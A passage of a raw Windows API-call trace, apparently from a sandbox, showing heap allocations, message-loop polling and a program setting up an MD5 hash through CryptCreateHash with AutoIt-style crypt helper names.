RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0157.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0157.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0157.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0157.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0157.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0157.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0157.802] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0157.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0157.802] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0157.803] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0157.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0157.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0157.803] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0157.803] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0157.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0157.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0157.803] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.803] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0157.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0157.803] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0157.803] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0157.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0157.803] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0157.803] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0157.803] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0157.803] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0157.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0157.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0157.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0157.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0157.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0157.804] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0157.804] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0157.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0157.804] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0157.804] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0157.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0157.804] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0157.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0157.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0157.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0157.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0157.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0157.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50c38, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0157.805] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0157.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0157.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0157.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0157.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0157.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0157.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0157.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0157.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0157.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0157.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0157.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0157.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0157.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0157.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0157.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0157.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0157.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0157.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0157.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0157.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0157.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0157.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0157.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0157.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0157.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0157.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0157.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0157.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0157.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0157.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0157.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0157.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0157.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0157.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0157.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0157.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0157.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0157.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0157.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0157.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0157.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0157.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0157.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0157.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0157.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0157.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0157.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0157.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0157.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0157.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0157.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0157.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0157.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0157.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0157.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0157.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0157.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0157.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0157.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0157.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0157.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0157.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0157.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0157.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0157.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0157.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0157.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0157.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0157.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0157.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0157.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0157.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0157.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0157.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0157.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0157.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0157.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0157.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0157.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0157.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0157.980] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0157.980] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0157.980] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0157.980] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0157.980] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0157.980] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0157.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0157.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0157.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0157.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0157.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0157.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0157.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0157.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0157.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0157.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0157.981] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0157.981] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0157.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0157.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0157.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0157.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0157.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0157.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0157.981] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0157.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0157.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0157.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0157.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0157.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0157.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0157.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0157.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0157.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0157.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0157.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0157.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e08 [0157.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0157.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0157.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0157.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0157.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54db8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0157.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0157.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0157.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0157.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0157.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0157.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0157.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0157.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0157.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0157.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0157.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0157.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0157.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0157.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0157.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0157.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0157.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0157.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0157.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0157.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0157.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0157.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0157.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0157.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0157.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0157.983] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0157.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0157.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0157.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0157.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0157.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0157.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0157.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0157.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0157.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0157.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0157.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0157.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0157.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0157.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0157.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0157.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0157.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54dd8 [0157.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0157.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0157.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0157.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0157.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0157.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0157.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0157.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0157.985] HeapFree (in: hHeap=0x970000, 